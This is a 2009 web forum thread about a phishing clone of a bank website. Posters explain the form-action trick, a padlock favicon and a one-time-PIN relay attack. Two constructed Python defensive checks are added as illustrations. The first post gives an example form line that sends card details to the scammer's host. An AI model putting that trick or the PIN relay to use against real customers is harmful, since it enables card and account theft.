Equitorial Bank Website Used For Interswitch 419 Scam (Nairaland Forum, Webmasters section; 11426 views)
Re: Equitorial Bank Website Used For Interswitch 419 Scam by cystein(m): 11:58am On Jun 07, 2009
Well guys, this ain't a difficult thing to do. What happens in this case is the scammers pick the page source but edit the form action, for example. If I have a form that I want to defraud you with, I can easily set it as follows: <form action="http://mywebsite.com/snb/9071:8080"> which instead posts me your card details, enough to give me access to your account. Always call the bank on the original numbers and not the contacts issued on the site.
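A defender-side check for the form-action trick described in this post, added here as an illustration and not code from the thread: it parses a page, resolves every credential form's action against the page URL, and flags forms that would post outside the bank's own hosts or over plain http. The sample page, the bank host and the collector URL are constructed.

```python
"""Flag credential forms on a page that would post somewhere other than
the site's own https host.  Constructed example, not code from the thread."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect each <form> with its action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html, page_url, trusted_hosts):
    """Return (kind, resolved_action) findings for every password form whose
    action leaves the trusted hosts ("foreign-host") or is not https ("cleartext")."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue                       # only forms that take credentials matter
        # An empty action posts back to the page itself, as browsers do.
        target = urlsplit(urljoin(page_url, form["action"]))
        host = (target.hostname or "").lower()
        if host not in trusted_hosts:
            findings.append(("foreign-host", target.geturl()))
        elif target.scheme != "https":
            findings.append(("cleartext", target.geturl()))
    return findings


# Constructed clone page: bank-looking login whose form posts to a collector host.
SAMPLE_PAGE = """<html><body>
<img src="padlock-favicon.png">
<form method="post" action="http://collector.example.net/snb/">
  <input name="card" type="text">
  <input name="pin" type="password">
</form>
<form method="get" action="/search">
  <input name="q" type="text">
</form>
</body></html>"""


def audit_sample():
    """Audit the constructed page as if served from the (assumed) bank host."""
    return audit_forms(SAMPLE_PAGE, "https://ibank.example-bank.com/login",
                       {"ibank.example-bank.com"})


if __name__ == "__main__":
    for kind, action in audit_sample():
        print(f"{kind}: credential form posts to {action}")
```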
Re: Equitorial Bank Website Used For Interswitch 419 Scam by pixiraver(m): 3:26pm On Jun 07, 2009
Stupid idiots, they keep sending me such mails and I simply ignore them because I know my bank won't send me such emails. All these banks need to employ professionals to handle their IT departments and not "Otigba" boys.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by GeorgeD1(m): 8:42pm On Jun 07, 2009
This crap is not new. It's been going on for over a year now. The fact that these smart alecs keep sending the same mail to the same people twenty times over shows that they're not that smart after all.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 11:05pm On Jun 07, 2009
aeso: You have said it all. I have a "but" though. I encountered a scenario with one of my clients when they had a phishing problem. A scammer actually placed a padlock image as a FAVICON. When the innocent customer received the phishing email, the first thing he checked was the padlock, which was trickily placed on the FAVICON IMAGE. What do you say to that?
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 12:09am On Jun 08, 2009
nitation: Good one; users will just have to be educated on where to look for the padlock and also make sure the URL begins with https. It really depends on the browser though, whether the browser uses a padlock or key. IE and Firefox use padlocks, I think Safari uses a key, not sure now what Opera uses. In IE and Firefox, the padlock should be at the bottom right, near the system clock. The users must double click it as well to verify it belongs to the bank and not some other site. It would be difficult to obtain a certificate in another company's name because of all the protocol it takes to obtain one, so this step is secure.
There is a new type of certificate called the Extended SSL Validation Certificate. If the site uses that, the browser address bar will turn green, just before the URL. It was designed that way so users can quickly notice it. Of course you'll need IE7 or Firefox 3. I am proud my bank has implemented this already: open GTBank's Internet banking website at https://ibank.gtbank.com/ibank2/login.aspx to see what I mean. The bank's name will also be indicated in the green bar, making it obvious.
Most of the phishing scams capitalize on the fact that users don't know what to watch out for, and it boils down to educating them and hoping they remember to look out for these things. Beyond that, there's really nothing else the bank, web developers, or security admins can do. It's all an end-user intelligence thing.
One other thing about Interswitch is that at the time of entering your PIN for a transaction, a java applet MUST be downloaded which provides a KEYPAD for entering the digits. The keypad is intended to thwart the efforts of those that install keyloggers on systems to capture keyboard strokes. That java applet must also be verified by clicking on the Verisign logo. Hope this answers your question?
Re: Equitorial Bank Website Used For Interswitch 419 Scam by shockreaction(m): 6:40am On Jun 08, 2009
Considering that their site was hacked a while ago, I can't say I'm surprised. Unfortunately, I lost the screenshot. Ah well.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Kay1kay1(m): 10:03am On Jun 08, 2009
Every bank gets a clone in these emails. It's not in any way the bank's carelessness. A few tips can help online customers.
1. Never enter your online banking through a link. Type in the site directly.
2. Never use wifi hotspots for online banking.
3. Use a very strong password. A military password with mixed numbers in between.
4. Never give anyone your password, as you may not know if the connection being used is secure or not.
5. Change your passwords regularly.
6. Make sure your bank has email or SMS notifications when deposits or withdrawals are made.
7. Use a digicode reader, a wireless device issued by your bank which gives random numbers which have to be entered on your online banking page.
If you are comfortable with the online thingy, switch to traditional banking instead.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Kay1kay1(m): 12:48pm On Jun 08, 2009
It's not necessarily the bank's fault. Any site can be cloned. Most times fraud is due to the carelessness of the customer. Here are some tips.
1. Never enter online banking through a link.
2. Never use a wifi hotspot for online banking.
3. Use a military password. Letters and numbers mixed in between.
4. Never give anyone your password, as you may not know how secure the connection being used is.
5. Make sure your bank issues SMS/email notifications whenever deposits or withdrawals are made.
6. Change your password regularly, say every month.
7. You can use a digicode reader, a wireless device from your bank that generates random numbers whenever you use internet banking.
If you feel uneasy about the online thingy, switch to traditional banking.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 1:51pm On Jun 08, 2009
@kaykay, I believe it is the fault of the bank and no one else. Being a bank, they are supposed to do some penetration testing.
@nitation I am quite in support of ur views. I think what these banks are supposed to do is educate customers when they are setting up online banking for them, which they fail to do. And yes, I think people also need to be educated about the Extended Validation. For banks that are yet to implement it, I will say it costs nothing to install SSL; SSL costs $45 and can be installed by anyone. Shebi na padlock you wan see, you go see am na! It is best you don't subscribe to online transfer if you don't clearly understand the risks involved.
aeso: In addition to that, ur session expires in 2 mins of inactivity, making it difficult for someone else to access ur account whenever you step out carelessly. GTB online banking does this too. At times, u have to log in severally before u can make a successful transfer, which is a good security feature.
Another common mistake ppl make is that they tend to use the same password for all accounts online. For instance, Seun definitely has access to ur nairaland password, forget encryption bla bla (just an example, hope I don't get banned), so using the same password for your mailbox could be suicidal, considering the fact that many websites nowadays have a password reminder. An attacker can just go to the website and fill the "I forgot my password" form, and you may be banking with one of the dumbest banks who will mail your password to your email box. Boom, you will pay for it.
It is secure to classify websites you register with into 4 categories, that is if you have problems with passwords:
1. Zero trust, e.g. torrent sites, forums
2. Less trusted, e.g. facebook
3. Trusted, e.g. yahoomail, gmail etc.
4. Most trusted, e.g. paypal, online banking etc.
Let 1, 2 and 3 share different levels of passwords and change the class 3 password regularly. Class 4 should have different hard-to-guess passwords if possible.
And yet, passwords can still be cracked. U may use a password as secure as e#4a(6^l;vo; if anyone can crack that, then they can have your money cos they actually worked for it.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:49pm On Jun 08, 2009
@ webdezzi IMO, pen testing is gradually losing its relevance. What attackers do now is wait patiently for newly discovered vulnerabilities and quickly exploit them the day they are made known (zero-day attacks), probably before developers release patches and definitely before sys/web admins can patch their servers. It also depends on who discovered the vulnerability - some have been circulated for months within the hacker community and have been exploited over and over again before the developers even get to know.
I've even heard of cases where celebrities use easy-to-guess secret questions - like your mother's maiden name, your boyfriend's middle name, which is almost public knowledge on the Internet (since they are celebrities) and hackers have used this to "recover" their passwords and gain access to their accounts. Another worrisome trend is the installation of keyloggers on systems at Internet cafes that monitor everything that was typed on the system for the whole of that day without the users' knowledge, including sites visited, usernames, passwords, etc. All an attacker needs to do is come back at the end of the day to retrieve all the confidential info typed for that day and see what damage he can do with it. In short, never provide any confidential information in a cafe. There are also a number of "free" antivirus software packages advertised on the Internet at random as flash animations screaming to be downloaded and claiming to offer protection from viruses, etc. Most of these are actually spyware that spy on the activities of the unsuspecting user and are very difficult to uninstall from the system. In short, there are just too many risks the average computer user must face.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:55pm On Jun 08, 2009
webdezzi: Have you implemented this yourself? At times those who know what to do don't do it.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 7:37pm On Jun 08, 2009
@ Aeso In Jupiter where I reside, one of the leading banks lost over $200 million in 6 months to an internet banking phishing scam. What the bank did was to implement the One-Time Pin technology (for those who care to know - this is an algorithm calculation that generates numbers/codes for a user who is accessing the internet banking at a particular time, through SMS preferably or email, and it expires within a time-frame). What happened next was, it became very difficult for phishers to trick people into providing their internet banking details. Even if they do, they (the phishers) do not have access to the user's cellphone. Now a MITM attack surfaced. Hackers develop an application that exploits communication between the user and the server residing on a secured location - I am referring to SSL. Like my first post - phishing has gone beyond how it seems. Open for argument -> - nitation
Re: Equitorial Bank Website Used For Interswitch 419 Scam by airroseice(m): 11:57pm On Jun 08, 2009
Lord help us!
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:14am On Jun 09, 2009
nitation: I don't see how an MITM attack would succeed if you are communicating over SSL with the true bank's servers in the first place and you make sure it remains the bank's server THROUGHOUT the transaction period. That's why I said earlier to always make sure the protocol is https and click on the padlock to verify the details on the certificate, since anyone can easily obtain a certificate. If there are any changes, the browser should warn the user unless that option has been turned off, which is so in many systems anyway. The MITM attack would only work for non-encrypted channels or where the certificate containing the bank's private key has been stolen or a certificate accidentally issued in the bank's name to the perpetrators of the MITM attack. MITM attacks have been successful where the attacker establishes https with the bank's server, but http with the client. In such cases the browser would warn that the client is about to switch from an encrypted mode to unencrypted and ask whether to continue. Most people would just click YES and won't notice the change to http (these issues are too technical for the average user). The other way such an MITM would work is if the attacker obtained a certificate in the bank's name. I remember Verisign once made the mistake of issuing 2 certificates in Microsoft's name to an impostor in 2001, which they later discovered through routine auditing after 6 weeks. Besides that I haven't heard of any others, or well, none have been publicly disclosed.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by LRcard: 6:07am On Jun 09, 2009
Kay1kay1:
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 6:42am On Jun 09, 2009
@LR_card: I kind of agree to some extent with both you and Kay1kay1. Although the bank should do their best to secure their servers, the best is never good enough in security. All it takes to hack a system is to discover a flaw in the software. Flaws are discovered every day and it is usually a cat and mouse game between hackers quickly exploiting the flaws and sys admins patching them. A determined hacker would usually wait patiently for a flaw to be discovered that he can exploit and quickly exploit it once known. Sys admins usually have to wait for the software developer to release a patch to correct the flaw, so they are at a disadvantage. However, most sysadmins never even bother to patch their systems even after patches have been released, and moreover, banks should have intrusion detection software installed on their web servers so they can know if unauthorized changes have taken place. So you do have a point as well.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 5:18pm On Jun 09, 2009
@ Aeso On the contrary, if a website uses only one-way SSL security (only the website has an SSL certificate) instead of two-way, which was the intention of SSL in the first place, then MITM can take place. In real terms, this is regarded as phishing 2.0, more sophisticated than the traditional method of phishing. Citibank fell victim in 2006 or so. - nitation
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 8:50am On Jun 10, 2009
nitation: SSL security for web browsing has always been 1-way, so I don't quite understand what you mean. The server sends its identification to the browser in a certificate that contains its public key, and the certificate is signed by a CA, e.g. Verisign, with the CA's private key. All the browser does is verify that the CA that signed the certificate is on its trusted list and that the certificate is not listed in a list of revoked certificates. The browser cannot confirm the contents or which site owns the certificate; you will have to verify that yourself by opening the padlock and checking the certificate. The browser can only trust the certificate because it was signed with the private key of a trusted CA, e.g. Verisign. The browser fetches the public key of the server from the certificate and uses it to encrypt messages. Messages encrypted by the public key can only be decrypted by the corresponding private key. Thus only the true server will be able to decrypt, because only that server would have the right private key, which is never made public.
If a man-in-the-middle is launched, it cannot succeed unless one of these is true:
- Encrypted connections from the server terminate at the MITM and new unencrypted connections are established from the MITM to the user's browser; in this case the browser would WARN the user that the encrypted connection is about to be broken and ask if the user would like to continue; OR
- Encrypted connections from the server terminate at the MITM and new encrypted connections are established to the client using the MITM's certificate key; OR
- The MITM has a copy of the server's private key and can open and intercept encrypted messages from the client and therefore view the account details.
Hope this makes sense? Cryptography is one of the toughest areas of security, so most ppl run from it.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 11:06am On Jun 10, 2009
@ Aeso To put an end to our endless argument, this is what is certain: SSL guarantees confidentiality and authentication only. There are many threats that attack web applications, including SQL Injection, XSS, CSRF, Denial of Service, Brute-Force Attack, MITM, etc. The technicality of the situation may not be understood by an average user in the MITM case. - nitation
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 7:49pm On Jun 10, 2009
In this scenario, MITM is an overkill. For an attacker to have been able to upload a file to that server, haba! I won't want to talk about the endless possibilities.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by lastpage: 1:33am On Jun 11, 2009
We've blamed the bank, we've blamed the hacker, we even blamed the "mugu" client. What about the GREEDY yob? In most cases, unless your greedy tendencies take over, if you did not register with ETB or InterSwitch, and some site is claiming to cancel your ATM card, what should you do? PRESS THE DELETE KEY! End of story!! Or maybe my greedy friend thinks such scam-mails can "unlock" some secret access to a fat ATM bank account for them? I've never walked into a banking hall since 2004 (I just detest the often useless questions and time-wasting that goes on in there at times) and I am yet to be duped online, but then, I've never wished to "win a lottery" or "inherit money from an unknown uncle" or from one American that died on flight 447! Finally, the golden rule of e-mail: if you cannot recognize the "sender" or the "subject" as legitimate, first time, hug the DELETE KEY. Am out for lunch.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 2:29am On Jun 11, 2009
@nitation Correction - SSL in this scenario will guarantee only confidentiality, not authentication, because the client's id cannot be verified to the server and the server's true id cannot be verified to the client. Probably integrity, depending on the context.
We have to differentiate between 2 types of losses here:
1. A bank loses money because an attacker was able to hack directly into the bank's records. This is majorly the bank's fault for inadequately protecting their systems, but very sophisticated attackers are usually ahead of the defenders, so it can still happen to any bank irrespective of all security measures the bank puts in place, e.g. zero-day attacks.
2. A bank loses money because an attacker tricked users into providing their details. This is not the bank's fault, and the only concrete things the bank can do are to:
a) educate its customers against falling for these tricks. MITM also falls in this category because it is outside the bank's control.
b) provide additional layers of authentication, e.g. SMS authentication, token authentication or email authentication (least secure), before completing any transaction. This will thwart MITMs and XSS unless the attacker also got hold of the 2nd layer authentication algorithm used for generating the authentication codes, or got hold of the users' tokens.
@webdezzi The scenario in this topic is quite simple and falls under no. 2. I agree with webdezzi; MITM is an overkill and wasted effort in this case when easier methods are available.
@ nitation - I am not saying the MITM against your bank which had additional layers of authentication is not possible; all I need to know is the exact details of how it worked to convince me it actually worked. Merely mentioning it was MITM or a complex attack is certainly insufficient to convince me. For the record, I'm a CISSP, CISSP-ISSAP, CEH and GCIA, should you need my services.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 8:20am On Jun 11, 2009
@ Aeso I can see you have bagged all the certificates. In this field, experience is what counts! I do not know how long you have been doing your thing, but one thing that is certain is, you have limited your ability to what you have encountered only. More so, I was giving a general understanding of what SSL does and not in the MITM situation. This is also gonna be my last argument on this topic as it's taking us nowhere. I am willing to contribute more on educative topics.
Take a look at this scenario: Bank X introduced the One-Time-Pin security feature for its customers whereby, before any transaction can be carried out, an eight-digit randomly generated PIN would be sent to the customer's cellphone. Let us continue:
1) An attacker tricks a user to click on a link;
2) The user entered his/her details on the attacker's crafted page;
3) Suddenly, a one-time PIN was sent to the user's cell phone. The user, not knowing, entered the OTP on the attacker's page;
4) The attacker has 30 minutes to perform whatever transaction, as the one-time PIN will expire.
The question here is, why did the bank send the valid one-time PIN to the user's cellphone even though he/she is not accessing the original website?
-nitation
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 9:55am On Jun 11, 2009
@nitation My brother, no be fight. Get what you mean now! This would not be a classical MITM. More like general identity theft. Here:
- The attacker sets up a rogue site that clearly isn't the bank's site (be it http or https)
- Users' details are collected at the rogue site and an automated script forwards the details to the bank's servers
- The bank's server sends the OTP to the user's phone
- The user enters the OTP in the hacker's web page
- The hacker collects the OTP and the previous account details and accesses the user's account
The bottom line is that it follows the same principle as the general attack. Users should not log in to their bank accounts using web links. They should type the URL directly in the browser or use a search engine like Google that has a complex ranking to locate the Internet banking URL for the bank if they are not sure. In most cases the real bank's URL will appear highest in the results. They should make sure the connection is https, check for the padlock and click it to verify the server they are submitting credentials to.
nitation: The CISSP is awarded after passing the exam and showing auditable evidence of 5 years' work experience. The ISSAP requires CISSP, passing another exam and another 2 yrs' experience in security architecture, so I have a minimum of 7 years' experience if not more.
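Serving nitation's OTP scenario above and the relay steps in this post, an added example that is not the bank's or the thread's code (the service, session ids, transaction strings and attempt limit are assumed): a one-time PIN bound to the exact transaction it was issued for, so a code the customer reveals for a "login" cannot approve "whatever transaction", and every code is single-use, expiring and guess-limited, with the SMS stating what the code approves.

```python
"""Transaction-bound one-time PIN service.  Constructed illustration of the
control the thread asks for; the real bank's implementation is not described."""
import hmac
import secrets
import time

OTP_DIGITS = 8               # the thread mentions an eight-digit PIN
OTP_TTL_SECONDS = 30 * 60    # the 30-minute validity mentioned in the thread
MAX_ATTEMPTS = 3             # assumed limit: stops guessing inside the window


class OtpService:
    """Issue and verify PINs; each PIN is bound to one (session, transaction)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        # session_id -> {"code", "transaction", "expires_at", "attempts"}
        self._pending = {}

    def issue(self, session_id, transaction):
        """Return (code, sms_text).  The SMS repeats the transaction so a
        customer who only typed a login on a look-alike page sees that the
        code would approve a transfer they never requested."""
        code = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._pending[session_id] = {
            "code": code, "transaction": transaction,
            "expires_at": self._clock() + OTP_TTL_SECONDS, "attempts": 0}
        sms = f"Code {code} approves ONLY: {transaction}. It expires in 30 minutes."
        return code, sms

    def verify(self, session_id, transaction, code):
        """Accept the code only for the same session and the same transaction
        it was issued for, before expiry, within the attempt limit, and once."""
        entry = self._pending.get(session_id)
        if entry is None:
            return False                      # nothing pending, or already used
        if self._clock() > entry["expires_at"]:
            del self._pending[session_id]     # expired: discard it
            return False
        entry["attempts"] += 1
        if entry["attempts"] > MAX_ATTEMPTS:
            del self._pending[session_id]     # too many tries: discard it
            return False
        if entry["transaction"] != transaction:
            return False                      # code was issued for something else
        if not hmac.compare_digest(entry["code"], code):
            return False                      # wrong code (constant-time compare)
        del self._pending[session_id]         # single use
        return True


def relay_scenario():
    """Walk the relay from the thread against a fixed clock and return the outcomes."""
    now = [1_000_000.0]                       # constructed clock we can advance
    svc = OtpService(clock=lambda: now[0])
    sid = "bank-session-opened-by-forwarding-script"   # assumed id
    transfer = "transfer NGN 50,000 to account 0123456789"  # constructed
    # The forwarded credentials only earn a login code; the SMS says so.
    code, sms = svc.issue(sid, "login")
    wrong_purpose = svc.verify(sid, transfer, code)     # cannot approve a transfer
    right_purpose = svc.verify(sid, "login", code)      # valid for what it was issued for
    replay = svc.verify(sid, "login", code)             # second use is refused
    # Expiry: a fresh code presented after the window is refused.
    code2, _ = svc.issue(sid, "login")
    now[0] += OTP_TTL_SECONDS + 1
    expired = svc.verify(sid, "login", code2)
    # Guessing: three wrong tries exhaust the code even if the fourth is right.
    now[0] += 1
    code3, _ = svc.issue(sid, "login")
    wrong = "00000000" if code3 != "00000000" else "00000001"
    for _ in range(MAX_ATTEMPTS):
        svc.verify(sid, "login", wrong)
    guessed = svc.verify(sid, "login", code3)
    return {"wrong_purpose": wrong_purpose, "right_purpose": right_purpose,
            "replay": replay, "expired": expired, "guessed": guessed, "sms": sms}


if __name__ == "__main__":
    for name, outcome in relay_scenario().items():
        print(f"{name}: {outcome}")
```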
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 12:39pm On Jun 11, 2009
@ AESO lol, in the IT industry, especially security, no one talks of ISSAP, CISSP etc. You are as good as what you know. I am a Mechanical Engineer and trust me, I no go computer school. But my passion for IT has driven me so far that I even train ppl who already bagged NIIT certs. (said humbly) Let's keep the certs away and face reality. Technology advances every day and the same goes for ways to go around it. Have you heard of a 13 year old boy who hacked into their school's computers in the UK? He never had to bag those certs to do that. This link might interest you: http://www.roadnews.com/html/Articles/historyofhacking.htm Also another dude got into US Defence computers from the UK using the internet. He shud be serving his jail term now, I guess, that's if the FBI won't invite him to work for them.
And I think you guys are giving out too much information. Just as others will learn from it, the many who are not aware may suffer from ppl of bad intent who may want to use this info to enrich their knowledge. It is obvious that MANY of these institutions have failed, not just ETB.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 6:44pm On Jun 11, 2009
@ webdezzi, I never studied comp. science myself; the issue of certs is more of a personal thingy though - I took them to challenge my knowledge and skills, but the ISSAP to boost my job opportunities on arriving in Australia. With tens or hundreds of resumes to choose from, everything counts. But like you said, what matters most is one's personal skills. Yea, lots of attacks here and there, every day on the news, but the trend has really changed now. Most attacks you read about in the news are from script kiddies - they rely on freely available tools developed by experts but have very little technical knowledge or skills of their own. Attacks are now seriously financially and espionage-motivated; that's where the pros come in, and attacks are usually sponsored, stealthy and in most cases go unnoticed because they cover their tracks.
As regards giving out information, it's all freely on the Internet anyway for those who care to look. There's an unending debate about security through obscurity - and I'm for open knowledge sharing. What I mean is, for instance, which is better - you design a lock for a safe, make the design blueprint open knowledge but keep the unlock code secret and difficult to figure out, or you keep the design blueprint secret, thinking that by doing so you are making it tougher to break into the safe? Statistics have shown that keeping the design blueprint secret gives you a false sense of security, thinking that by not making it public it becomes more difficult to understand, hence more secure. The reality is that your design will definitely have flaws which you may not see, but fellow experts can, and advise you on how to correct them. The other "hard" way for you to know about probs with your design is when someone breaks in without knowledge of your unlock codes and you start wondering how he did it.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by andre3000: 8:00am On Jun 12, 2009
I've also received some scam emails like these ones. Very dangerous stuff.
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 5:55am On Jun 14, 2009
Interesting webdezzi, neither did I go to computer school, and then the guy nitation said placed the padlock at the favicon too, I don't think he learnt that in computer school. I am sure me sef can fall for the padlock thing!
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 6:09pm On Jun 15, 2009
lol, I guess you will fall for that after hours of programming and you have no clue what your surname is anymore, abi? dhtml ola-encode
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 10:05pm On Jun 15, 2009
I think I am going to need to add that padlock to my site, as a favicon, who knows, maybe webdezzi will fall for it...